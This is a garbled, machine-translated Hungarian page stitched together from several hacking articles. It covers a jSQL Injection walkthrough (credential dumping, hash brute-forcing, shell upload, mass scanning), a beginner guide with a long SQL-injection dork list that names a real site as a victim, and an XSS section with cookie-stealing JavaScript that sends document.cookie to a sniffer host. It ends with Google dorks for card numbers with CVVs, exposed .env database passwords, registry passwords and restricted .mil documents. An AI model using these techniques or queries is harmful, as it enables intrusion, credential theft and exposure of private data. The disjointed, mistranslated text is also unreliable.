Útmutató a jSQL Injection használatához, amely egy többfunkciós eszköz az SQL injekciók kereséséhez és kihasználásához a Kali Linuxban. Kevéssé ismert Google-funkciók segítségével megtalálja a rejtett Inurl megjegyzés kívánt php azonosítóját

Futtassa a letöltött fájlt dupla kattintással(kell virtuális gép ).

3. Névtelenség a webhely SQL-befecskendezésének ellenőrzésekor
A Tor és a Privoxy beállítása Kali Linux

[Részlet fejlesztés alatt]

A Tor és a Privoxy beállítása Windows rendszeren

[Részlet fejlesztés alatt]

Proxy beállítások a jSQL Injectionben

[Részlet fejlesztés alatt]

4. A webhely ellenőrzése SQL-befecskendezés szempontjából a jSQL Injection segítségével

A programmal való munkavégzés rendkívül egyszerű. Csak írja be a webhely címét, és nyomja meg az ENTER billentyűt.

A következő képernyőkép azt mutatja, hogy a webhely egyszerre háromféle SQL-befecskendezéssel szemben sebezhető (az ezekre vonatkozó információk a jobb alsó sarokban találhatók). Az injekciók nevére kattintva válthatja a használt módszert:

Emellett a meglévő adatbázisok már megjelentek számunkra.

Az egyes táblázatok tartalmát megtekintheti:

A táblákkal kapcsolatban általában a rendszergazdai hitelesítő adatok a legérdekesebbek.

Ha szerencséd van, és megtalálod a rendszergazda adatait, akkor még korai örülni. Továbbra is meg kell találnia az adminisztrációs panelt, ahol megadhatja ezeket az adatokat.

5. Keressen adminisztrációs paneleket a jSQL Injection segítségével

Ehhez lépjen a következő lapra. Itt a lehetséges címek listája fogad minket. Kiválaszthat egy vagy több oldalt az ellenőrzéshez:

A kényelem abban rejlik, hogy nincs szükség más programok használatára.

Sajnos nincs túl sok figyelmetlen programozó, aki tiszta szövegben tárolja a jelszavakat. A jelszósorban gyakran találunk ilyesmit

8743b52063cd84097a65d1633f5c74f5

Ez egy hash. Nyers erővel visszafejtheti. És... A jSQL Injection beépített nyers erővel rendelkezik.

6. Brute force hashek jSQL Injection használatával

A kétségtelen kényelem az, hogy nem kell más programokat keresnie. A legnépszerűbb hashek közül sok támogatott.

Ez nem a legjobb megoldás. Ahhoz, hogy guru lehessen a hash-ek dekódolásában, az orosz nyelvű „” könyv ajánlott.

De természetesen, ha nincs kéznél más program, vagy nincs idő a tanulásra, nagyon jól jön a jSQL Injection a beépített brute force funkciójával.

Vannak beállítások: beállíthatjuk, hogy mely karakterek szerepeljenek a jelszóban, a jelszó hossztartománya.

7. Fájlműveletek az SQL injekciók észlelése után

Az adatbázisokkal végzett műveletek mellett - azok olvasása és módosítása, ha SQL injekciót észlel, a következő fájlműveletek hajthatók végre:

  • fájlok olvasása a szerveren
  • új fájlok feltöltése a szerverre
  • shell-ek feltöltése a szerverre

És mindez a jSQL Injectionben van megvalósítva!

Vannak korlátozások – az SQL szervernek fájljogosultságokkal kell rendelkeznie. Az értelmeseket rendszergazdák mozgássérültek és hozzáférhetnek fájlrendszer nem fogja tudni megszerezni.

A fájljogosultságok megléte meglehetősen egyszerű ellenőrizni. Lépjen az egyik lapra (fájlok olvasása, shell létrehozása, új fájl feltöltése), és próbálja meg végrehajtani a megadott műveletek egyikét.

Egy másik nagyon fontos megjegyzés - tudnunk kell a fájl pontos abszolút elérési útját, amellyel dolgozni fogunk - különben semmi sem fog működni.

Nézze meg a következő képernyőképet:

Bármilyen kísérletre, hogy egy fájlt kezeljünk, ezt a választ kapjuk: Nincs FILE jogosultság (nincs fájljogosultság). És itt semmit sem lehet tenni.

Ha ehelyett másik hiba lép fel:

Hiba történt a [könyvtárnév]-be írásakor

Ez azt jelenti, hogy helytelenül adta meg az abszolút elérési utat, ahová a fájlt írni kívánja.

Az abszolút út kitalálásához legalább tudnod kell operációs rendszer amelyen a szerver fut. Ehhez váltson a Hálózat lapra.

Ez a bejegyzés (Win64 sor) okot ad arra, hogy feltételezzük, hogy Windows operációs rendszerrel van dolgunk:

Életben tartás: timeout=5, max=99 Szerver: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Csatlakozás: Életben tartás Módszer: HTTP/1.1 200 OK Tartalom-hossz: 353 Dátum: 2015. december 11. péntek 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tartalomtípus: szöveg/html; charset=UTF-8

Itt van néhány Unix (*BSD, Linux):

Átviteli kódolás: darabolt Dátum: 2015. december 11. péntek 11:57:02 GMT Módszer: HTTP/1.1 200 OK Életben tartás: timeout=3, max=100 Csatlakozás: életben tartás Tartalom típusa: szöveg/html X- Üzemeltető: PHP/5.3.29 Szerver: Apache/2.2.31 (Unix)

És itt van a CentOS:

Módszer: HTTP/1.1 200 OK Lejár: 1981. november 19. csütörtök, 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Kapcsolat: életben tartás X-Cache-Lookup: MISS from t1.hoster.ru:6666 Szerver: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS innen t1.hoster.ru Cache-Control: nincs tárhely, nincs gyorsítótár, újra kell érvényesíteni, utólagos ellenőrzés=0, előzetes ellenőrzés=0 Pragma: nincs gyorsítótár Dátum: 2015. december 11. péntek, 12:08:54 GMT Átviteli kódolás: darabolt tartalomtípus: szöveg/html; charset=WINDOWS-1251

Windows rendszeren a webhelyek tipikus mappa a C:\Server\data\htdocs\. Valójában azonban, ha valaki „gondolt” egy szervert Windows rendszeren, akkor nagyon valószínű, hogy ez a személy semmit sem hallott a jogosultságokról. Ezért a próbálkozást közvetlenül a C:/Windows/ könyvtárból kell elkezdenie:

Amint látja, elsőre minden rendben ment.

De maguk a jSQL Injection héjak is kétségeket ébresztenek bennem. Ha rendelkezik fájljogosultsággal, akkor webes felülettel könnyedén feltölthet valamit.

8. A helyek tömeges ellenőrzése SQL-befecskendezéshez

És még ez a funkció is elérhető a jSQL Injectionben. Minden rendkívül egyszerű - töltse le a webhelyek listáját (fájlból importálható), válassza ki azokat, amelyeket ellenőrizni szeretne, és kattintson a megfelelő gombra a művelet elindításához.

Következtetés a jSQL Injectionből

A jSQL injekció jó, erőteljes eszköz a webhelyeken található SQL-befecskendezések keresésére és felhasználására. Kétségtelen előnyei: könnyű kezelhetőség, beépített kapcsolódó funkciók. A jSQL Injection a kezdők legjobb barátja lehet webhelyek elemzésekor.

A hiányosságok között megjegyezném az adatbázisok szerkesztésének lehetetlenségét (legalábbis én nem találtam ezt a funkciót). Mint minden grafikus felhasználói eszköz esetében, ennek a programnak az egyik hátránya annak tulajdonítható, hogy nem használható szkriptekben. Ennek ellenére némi automatizálás is lehetséges ebben a programban – a beépített tömeges helyszíni szkennelés funkciónak köszönhetően.

A jSQL Injection program használata sokkal kényelmesebb, mint az sqlmap. De az sqlmap több típusú SQL-injektálást támogat, rendelkezik a fájltűzfalakkal való munkavégzéssel és néhány más funkcióval.

Alsó sor: jSQL Injection - legjobb barátja kezdő hacker.

A programhoz a Kali Linux Encyclopedia súgója ezen az oldalon található: http://kali.tools/?p=706

És most elmondom, hogyan kell feltörni valamit különösebb ismeretek nélkül. Azonnal megmondom, hogy ebből kevés haszna van, de akkor is.
Először is meg kell találnia magukat a webhelyeket. Ehhez nyissa meg a google.com webhelyet, és keressen rá a dorks kifejezésre

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:cikk.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:vélemények.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:letöltés.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:cikk.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:termékrészletek .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:esemény.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:anyag.php?id= inurl:vélemények.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

itt van egy kis lista. Használhatod a tiédet. És így megtaláltuk az oldalt. Például http://www.vestitambov.ru/
Ezután töltse le ezt a programot

**Rejtett tartalom: A rejtett tartalom megtekintéséhez a bejegyzések számának legalább 3-nak kell lennie.**

Kattintson az OK gombra. Ezután beillesztjük az áldozat helyét.
Megnyomjuk a startot. Ezután várjuk az eredményeket.
Így a program SQL biztonsági rést talált.

Ezután töltse le a Havijt, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= illessze be oda a kapott linket. Nem fogom elmagyarázni, hogyan kell használni a Havijt, és hol lehet letölteni; Minden. Megkapta a szükséges adatokat - a rendszergazdai jelszót, és ezután már csak a képzeletén múlik.

P.S. Ez az első próbálkozásom, hogy írjak valamit. Elnézést, ha valami baj van

Úgy döntöttem, beszélek egy kicsit információbiztonság. A cikk hasznos lesz kezdő programozók és azok számára, akik most kezdtek el foglalkozni a Frontend fejlesztésével. mi a probléma?

Sok kezdő fejlesztő annyira belemerül a kódírásba, hogy teljesen megfeledkezik munkája biztonságáról. És ami a legfontosabb, megfeledkeznek az olyan sebezhetőségekről, mint az SQL és XXS lekérdezések. Egyszerű jelszavakat is kitalálnak adminisztrációs paneljeikhez, és nyers erőszaknak vannak kitéve. Mik ezek a támadások, és hogyan lehet elkerülni őket?

SQL injekció

Az SQL-befecskendezés az adatbázis elleni támadások leggyakoribb típusa, amelyet egy adott DBMS-re vonatkozó SQL-lekérdezés során hajtanak végre. Sok ember, sőt nagyvállalat is szenved az ilyen támadásoktól. Az ok egy fejlesztői hiba az adatbázis írásakor és szigorúan véve az SQL lekérdezések.

Az SQL-lekérdezésekben használt bemeneti adatok helytelen feldolgozása miatt SQL injekciós támadás lehetséges. Ha egy hacker támadása sikeres, akkor nemcsak az adatbázisok tartalmát, hanem a jelszavait és az adminisztrációs panel naplóit is elveszítheti. És ez az adat elég lesz ahhoz, hogy teljesen átvegye a webhelyet, vagy visszafordíthatatlan módosításokat hajtson végre rajta.

A támadás sikeresen reprodukálható PHP, ASP, Perl és más nyelveken írt szkriptekben. Az ilyen támadások sikere inkább attól függ, hogy milyen DBMS-t használnak, és hogyan valósítják meg magát a szkriptet. A világon számos sebezhető webhely található az SQL-injekciókhoz. Ezt könnyű ellenőrizni. Csak írja be a „dorks” szót – ezek speciális lekérdezések a sebezhető webhelyek kereséséhez. Íme néhány közülük:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:cikk.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:oldal.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:cikk.php?id=

Hogyan kell használni őket? Elég beírni őket Google kereső vagy a Yandex. A keresőmotor nem csak egy sebezhető webhelyet ad, hanem egy oldalt is a sérülékenységről. De nem állunk meg itt, és megbizonyosodunk arról, hogy az oldal valóban sebezhető. Ehhez elég az „id=1” érték mögé tenni egyetlen idézet"'". Valami ilyesmi:

  • inurl:games.php?id=1'

És az oldal hibaüzenetet ad nekünk kb SQL lekérdezés. Mire van szüksége ezután a hackerünknek?

És akkor pont erre a hivatkozásra van szüksége a hibaoldalra. Ezután a sérülékenység kidolgozása a legtöbb esetben a „Kali linux” disztribúcióban történik az ehhez a részhez tartozó segédprogramokkal: beilleszti a kódot és végrehajtja a szükséges műveleteket. Hogy ez hogyan fog történni, azt nem tudom megmondani. De az interneten találsz erről információt.

XSS támadás

Ez a fajta támadás Cookie-fájlokon történik. A felhasználók viszont szeretik menteni őket. Miért ne? Mihez kezdenénk nélkülük? Végül is a Cookie-nak köszönhetően nem kell százszor megadnunk a Vk.com vagy a Mail.ru jelszavát. És kevesen vannak, akik elutasítják őket. De az interneten gyakran megjelenik egy szabály a hackerek számára: a kényelmi együttható egyenesen arányos a bizonytalansági együtthatóval.

Az XSS támadás végrehajtásához hackerünknek JavaScript ismerete szükséges. Első pillantásra a nyelv nagyon egyszerű és ártalmatlan, mert nem fér hozzá a számítógépes erőforrásokhoz. A hacker csak JavaScripttel tud dolgozni böngészőben, de ez is elég. Végül is az a lényeg, hogy beírjuk a kódot a weboldalra.

Nem beszélek részletesen a támadás folyamatáról. Csak az alapokat és annak jelentését mondom el, hogyan történik ez.

Egy hacker hozzáadhat JS-kódot néhány fórumhoz vagy vendégkönyvhöz:

document.location.href =”http://192.168.1.7/sniff.php?test”

A szkriptek átirányítanak minket a fertőzött oldalra, ahol a kód lefut: legyen szó snifferről, valamilyen tárhelyről vagy exploitról, ami valahogy ellopja a cookie-jainkat a gyorsítótárból.

Miért JavaScript? Mivel a JavaScript kiválóan kezeli a webes kéréseket, és hozzáfér a cookie-khoz. De ha a szkriptünk elvisz minket valamilyen oldalra, azt a felhasználó könnyen észreveszi. Itt a hacker egy ravaszabb opciót használ - egyszerűen beírja a kódot a képbe.

Img=új kép();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Egyszerűen létrehozunk egy képet, és hozzárendeljük a szkriptünket címként.

Hogyan védheti meg magát mindezektől? Nagyon egyszerű – ne kattintson a gyanús linkekre.

DoS és DDos támadások

DoS (az angol szolgáltatásmegtagadásból - szolgáltatás megtagadása) - hacker támadás számítógépes rendszeren azzal a céllal, hogy meghibásodjon. Ez olyan feltételek megteremtését jelenti, amelyek mellett a rendszer jóhiszemű felhasználói nem férhetnek hozzá a biztosítotthoz rendszer erőforrások(szerverek), vagy ez a hozzáférés nehézkes. A rendszer meghibásodása egy lépés is lehet az átvétel felé, ha vészhelyzetben a szoftver kritikus információkat állít elő: például egy verziót, egy programkód egy részét stb. De ez leggyakrabban a gazdasági nyomás mértéke: egy egyszerű szolgáltatás elvesztése, amely bevételt termel. A szolgáltatótól érkező számlák vagy a támadások elkerülésére tett intézkedések jelentősen eltalálják a „célpontot” Jelenleg a DoS és a DDoS támadások a legnépszerűbbek, mivel ezek lehetővé teszik, hogy szinte minden rendszer meghibásodjon anélkül, hogy jogilag jelentős bizonyíték maradna.

Mi a különbség a DoS és a DDos támadás között?

A DoS egy támadás okos módon. Például, ha a szerver nem ellenőrzi a bejövő csomagok helyességét, akkor egy hacker olyan kérést küldhet, amelynek feldolgozása örökké tart, és a processzornak nem lesz elegendő ideje más kapcsolatokkal való együttműködésre. Ennek megfelelően az ügyfelektől megtagadják a szolgáltatást. De ilyen módon nem lehet túlterhelni vagy letiltani a nagy, jól ismert webhelyeket. Meglehetősen széles csatornákkal és szupererős szerverekkel vannak felvértezve, amelyek gond nélkül megbirkóznak az ilyen túlterheléssel.

A DDoS valójában ugyanaz a támadás, mint a DoS. De ha a DoS-ben egy kéréscsomag van, akkor a DDoS-ben több száz vagy több is lehet. Még a szupererős szerverek sem képesek megbirkózni egy ilyen túlterheléssel. Hadd mondjak egy példát.

DoS-támadásról akkor beszélünk, amikor valakivel beszélgetünk, de ekkor megjelenik egy rossz modorú személy, és hangosan kiabálni kezd. Beszélni vagy lehetetlen, vagy nagyon nehéz. Megoldás: hívja a biztonságiakat, akik megnyugszanak és eltávolítják az illetőt a helyiségből. A DDoS támadások az, amikor ilyen rossz modorú emberek ezres tömege rohan be. Ebben az esetben a biztonságiak nem tud mindenkit lekötni és elvinni.

A DoS és a DDoS számítógépekről, az úgynevezett zombikról valósul meg. Ezek a hackerek által feltört felhasználók számítógépei, akik nem is sejtik, hogy gépük egy szerver elleni támadásban vesz részt.

Hogyan védheti meg magát ettől? Általában semmiképpen. De megnehezítheti a hacker dolgát. Ehhez jó tárhelyet kell választania erős szerverekkel.

Bruteforce támadás

Egy fejlesztő rengeteg támadásvédelmi rendszert kitalálhat, teljes körűen átnézheti az általunk írt szkripteket, ellenőrizheti az oldalt a sebezhetőségekért stb. Ám amikor a webhely elrendezésének utolsó lépéséhez ér, nevezetesen amikor egyszerűen csak jelszót tesz az adminisztrációs panelre, egy dolgot elfelejthet. Jelszó!

Szigorúan nem ajánlott egyszerű jelszót beállítani. Ez lehet 12345, 1114457, vasya111 stb. Nem ajánlott 10-11 karakternél rövidebb jelszavakat beállítani. Ellenkező esetben a leggyakoribb és legegyszerűbb támadás érheti Önt - a nyers erő.

A brute force egy szótári jelszótámadás speciális programok. A szótárak különbözőek lehetnek: latin, számok szerinti felsorolás, mondjuk egy bizonyos tartományig, vegyes (latin + számok), sőt vannak szótárak egyedi karakterekkel @#4$%&*~~`’”\ ? stb.

Természetesen ez a fajta támadás könnyen elkerülhető, csak egy összetett jelszót kell kitalálnia. Még egy captcha is megmenthet. Továbbá, ha webhelye CMS-en készült, akkor sokan észlelik az ilyen típusú támadásokat, és blokkolják az IP-címet. Mindig emlékeznie kell arra, hogy minél több különböző karakter van egy jelszóban, annál nehezebb kitalálni.

Hogyan működnek a hackerek? A legtöbb esetben vagy sejtik, vagy előre tudják a jelszó egy részét. Teljesen logikus feltételezni, hogy a felhasználó jelszava biztosan nem 3 vagy 5 karakterből áll. Az ilyen jelszavak gyakori hackeléshez vezetnek. Alapvetően a hackerek 5-10 karaktert vesznek fel, és több olyan karaktert adnak hozzá, amelyeket előre ismerhetnek. Ezután létrejön a szükséges tartományú jelszavak. A Kali Linux disztribúció még ilyen esetekre is rendelkezik programokkal. És íme, a támadás már nem tart sokáig, mivel a szótár kötete már nem olyan nagy. Ezenkívül a hacker használhatja a videokártya erejét. Némelyikük támogatja a CUDA rendszert, és a keresési sebesség akár 10-szeresére nő. És most látjuk, hogy a támadás ilyen egyszerű módon egészen valóságos. De nem csak a webhelyek vannak kitéve nyers erőszaknak.

Tisztelt fejlesztők, soha ne feledkezzünk meg az információbiztonsági rendszerről, mert manapság sokan, köztük államok is szenvednek ilyen típusú támadásoktól. Hiszen a legnagyobb sebezhetőség az, aki mindig valahol elterelheti a figyelmét, vagy kihagy valamit. Programozók vagyunk, de nem programozott gépek. Mindig légy résen, mert az információvesztés súlyos következményekkel járhat!

A személyes adatok megszerzése nem mindig jelent feltörést – néha közzéteszik nyilvános hozzáférés. Tudás Google beállításokés egy kis találékonyság lehetővé teszi, hogy sok érdekes dolgot találjon - a hitelkártyaszámoktól az FBI-dokumentumokig.

FIGYELMEZTETÉS Minden információ csak tájékoztató jellegű. Sem a szerkesztők, sem a szerző nem vállal felelősséget a cikk anyagai által okozott esetleges károkért.

Ma már minden az internetre csatlakozik, a hozzáférés korlátozásával alig törődnek. Ezért sok személyes adat a keresőmotorok martalékává válik. A pókrobotok már nem korlátozódnak a weboldalakra, hanem minden interneten elérhető tartalmat indexelnek, és folyamatosan adnak hozzá nem nyilvános információkat az adatbázisaikhoz. Ezeket a titkokat könnyű megtudni – csak tudnod kell, hogyan kérdezz rájuk.

Fájlokat keres

Képes kezekben a Google gyorsan megtalál mindent, ami nem található meg az interneten, például személyes adatokat és fájlokat hivatalos használatra. Gyakran kulcsként vannak elrejtve a lábtörlő alatt: nincsenek valódi hozzáférési korlátozások, az adatok egyszerűen az oldal hátulján hevernek, ahová egyetlen hivatkozás sem vezet. A Google szabványos webes felülete csak ezt biztosítja alapbeállítások fejlett keresés, de még ezek is elegendőek lesznek.

A Google keresését egy adott fájltípusra korlátozhatja két operátor használatával: filetype és ext . Az első azt a formátumot adja meg, amelyet a keresőmotor a fájl címéből állapított meg, a második pedig a fájl kiterjesztését, függetlenül annak belső tartalmától. Kereséskor mindkét esetben csak a kiterjesztést kell megadni. Kezdetben az ext operátort olyan esetekben lehetett kényelmesen használni, amikor a fájl nem rendelkezik meghatározott formátumjellemzőkkel (például ini és cfg konfigurációs fájlok keresésére, amelyek bármit tartalmazhatnak). Mostanra megváltoztak a Google algoritmusai, és nincs látható különbség az operátorok között – a legtöbb esetben az eredmények ugyanazok.


Az eredmények szűrése

Alapértelmezés szerint a Google az indexelt oldalak összes fájljában keres szavakat és általában minden beírt karaktert. Korlátozhatja a keresési területet legfelső szintű domain, egy adott webhely vagy a keresési sorrend helye szerint magukban a fájlokban. Az első két lehetőséghez használja a webhely operátorát, majd írja be a domain vagy a kiválasztott webhely nevét. A harmadik esetben az operátorok egész halmaza lehetővé teszi az információk keresését a szolgáltatási mezőkben és a metaadatokban. Például az allinurl magukban a hivatkozások törzsében találja meg a megadottat, allinachor - a címkével ellátott szövegben , allintitle - oldalcímekben, allintext - az oldalak törzsében.

Minden operátorhoz létezik egy rövidebb névvel ellátott könnyű verzió (az összes előtag nélkül). A különbség az, hogy az allinurl az összes szót megtalálja, az inurl pedig csak az elsőhöz. A lekérdezés második és azt követő szavai bárhol megjelenhetnek a weboldalakon. Az inurl operátor is különbözik egy másik, hasonló jelentésű operátortól - site. Az első azt is lehetővé teszi, hogy a keresett dokumentumra mutató hivatkozásban tetszőleges karaktersorozatot találjon (például /cgi-bin/), amelyet széles körben használnak ismert sebezhetőségű összetevők megtalálására.

Próbáljuk ki a gyakorlatban. Használjuk az allintext szűrőt, és a kérésből készítsünk egy listát a hitelkártyák számáról és ellenőrző kódjairól, amelyek csak két év múlva járnak le (vagy amikor a tulajdonosok belefáradnak az etetésbe).

Allintext: kártyaszám lejárati dátuma /2017 cvv

Ha azt olvassuk a hírekben, hogy egy fiatal hacker „feltörte” a Pentagon vagy a NASA szervereit, titkos információkat lopva, a legtöbb esetben éppen a Google használatának ilyen alaptechnikájáról beszélünk. Tegyük fel, hogy érdekel minket a NASA alkalmazottainak listája és elérhetőségeik. Bizonyára elérhető egy ilyen lista elektronikus formában. A kényelem kedvéért vagy a felügyelet miatt magán a szervezet honlapján is megtalálható lehet. Logikus, hogy ebben az esetben nem lesz rá hivatkozás, mivel belső használatra készült. Milyen szavak lehetnek egy ilyen fájlban? Legalább - a „cím” mező. Mindezen feltételezések tesztelése egyszerű.


Inurl:nasa.gov fájltípus:xlsx "cím"


Használjuk a bürokráciát

Az ilyen leletek kellemesek. Az igazán komoly fogást a Google üzemeltetőinek részletesebb ismerete a webmesterek számára, maga a Hálózat és a keresett dolgok felépítésének sajátosságai jelentik. A részletek ismeretében könnyedén szűrheti az eredményeket és finomíthatja a szükséges fájlok tulajdonságait, hogy a többiben valóban értékes adatokhoz jusson. Vicces, hogy itt a bürokrácia segít. Szabványos készítményeket állít elő, amelyek kényelmesek az internetre véletlenül kiszivárgott titkos információk keresésére.

Például a terjesztési nyilatkozat bélyegzője, amely kötelező az Egyesült Államok Védelmi Minisztériumának irodájában, szabványos korlátozásokat jelent a dokumentum terjesztésére vonatkozóan. Az A betű nyilvános közzétételeket jelöl, amelyekben nincs semmi titok; B - kizárólag belső használatra szánt, C - szigorúan bizalmas, és így tovább F-ig. Külön kiemelkedik az X betű, amely különösen értékes, legmagasabb szintű államtitkot képviselő információt jelöl. Azok keressenek ilyen dokumentumokat, akiknek ezt szolgálatban kell megtenniük, mi pedig a C betűs fájlokra szorítkozunk. A DoDI 5230.24-es irányelve szerint ez a jelölés az exportellenőrzés alá tartozó kritikus technológiák leírását tartalmazó dokumentumokhoz tartozik. . Ilyen gondosan védett információk találhatók az amerikai hadsereg számára fenntartott legfelső szintű domain.mil webhelyein.

"FORGALÁSI NYILATKOZAT C" inurl:navy.mil

Nagyon kényelmes, hogy a .mil domain csak az Egyesült Államok Védelmi Minisztériumának és szerződéses szervezeteinek webhelyeit tartalmazza. A domain korlátozással rendelkező keresési eredmények kivételesen letisztultak, és a címek magukért beszélnek. Az orosz titkok ilyen módon való keresése gyakorlatilag haszontalan: a domains.ru és.rf-ben káosz uralkodik, és számos fegyverrendszer neve botanikainak hangzik (PP „Kiparis”, önjáró fegyverek „Akatsia”) vagy akár mesésnek ( TOS „Buratino”).


A .mil domainben található webhely bármely dokumentumának gondos tanulmányozásával további jelölőket láthat a keresés finomításához. Például a „Sec 2751” exportkorlátozásra való hivatkozás, amely érdekes műszaki információk kereséséhez is kényelmes. Időről időre eltávolítják azokról a hivatalos oldalakról, ahol egykor megjelent, ezért ha nem tud egy érdekes linket követni a keresési eredmények között, használja a Google gyorsítótárát (gyorsítótár operátor) vagy az Internet Archívum webhelyét.

Felhőkbe mászni

A véletlenül feloldott kormányzati dokumentumokon kívül a Google gyorsítótárában időnként felbukkannak a Dropboxból és más adattárolási szolgáltatásokból származó személyes fájlokra mutató hivatkozások, amelyek nyilvánosan közzétett adatokhoz „privát” hivatkozásokat hoznak létre. Még rosszabb az alternatív és házi készítésű szolgáltatásokkal. A következő lekérdezés például minden olyan Verizon-ügyfél adatait keresi, akiknek FTP-kiszolgálója van telepítve, és aktívan használja az útválasztót.

Allinurl:ftp://verizon.net

Ma már több mint negyvenezer ilyen okos ember van, 2015 tavaszán pedig jóval többen voltak. A Verizon.net helyett bármely ismert szolgáltató nevét helyettesítheti, és minél híresebb, annál nagyobb lehet a fogás. A beépített FTP-kiszolgálón keresztül az útválasztóhoz csatlakoztatott külső tárolóeszközön lévő fájlokat tekintheti meg. Általában ez egy NAS távoli munkához, egy személyes felhő vagy valamilyen peer-to-peer fájlletöltés. Az ilyen adathordozók minden tartalmát a Google és más keresőmotorok indexeli, így a külső meghajtókon tárolt fájlokat közvetlen hivatkozáson keresztül érheti el.

A konfigurációkat nézegetve

A felhőre való széleskörű migráció előtt az egyszerű FTP-szerverek távoli tárolóként működtek, amiben szintén sok volt a sebezhetőség. Sok közülük ma is aktuális. Például a népszerű WS_FTP Professional program konfigurációs adatokat, felhasználói fiókokat és jelszavakat tárol a ws_ftp.ini fájlban. Könnyen megtalálható és olvasható, mivel minden rekord szöveges formátumban van elmentve, a jelszavak pedig a Triple DES algoritmussal titkosítva vannak minimális homályosítás után. A legtöbb verzióban elegendő az első bájt eldobása.

Az ilyen jelszavak visszafejtése egyszerű a WS_FTP Password Decryptor segédprogram vagy egy ingyenes webszolgáltatás segítségével.

Ha egy tetszőleges webhely feltöréséről beszélünk, ez általában a jelszó megszerzését jelenti a CMS vagy az alkalmazások konfigurációs fájljainak naplóiból és biztonsági másolataiból. e-kereskedelem. Ha ismeri jellemző szerkezetüket, könnyen jelezheti kulcsszavakat. A ws_ftp.ini fájlban található sorok rendkívül gyakoriak. Például a Drupalban és a PrestaShopban mindig van egy felhasználói azonosító (UID) és egy hozzá tartozó jelszó (pwd), és minden információ .inc kiterjesztésű fájlokban tárolódik. Az alábbiak szerint kereshet rájuk:

"pwd=" "UID=" ext:inc

DBMS jelszavak felfedése

Az SQL szerverek konfigurációs fájljaiban nevek és címek email A felhasználók tiszta szövegben vannak tárolva, és jelszavak helyett az MD5-kivonatokat rögzítik. Szigorúan véve lehetetlen visszafejteni őket, de az ismert hash-jelszó párok között találhatunk megfelelőt.

Még mindig vannak olyan DBMS-ek, amelyek nem is használnak jelszókivonatolást. Bármelyik konfigurációs fájlja egyszerűen megtekinthető a böngészőben.

Intext:DB_PASSWORD fájltípus:env

megjelenése óta Windows szerverek A konfigurációs fájlok helyét részben a registry foglalta el. Ugyanúgy kereshet az ágai között, a reg fájltípust használva. Például így:

Fájltípus:reg HKEY_CURRENT_USER "Password"=

Ne felejtsük el a nyilvánvalót

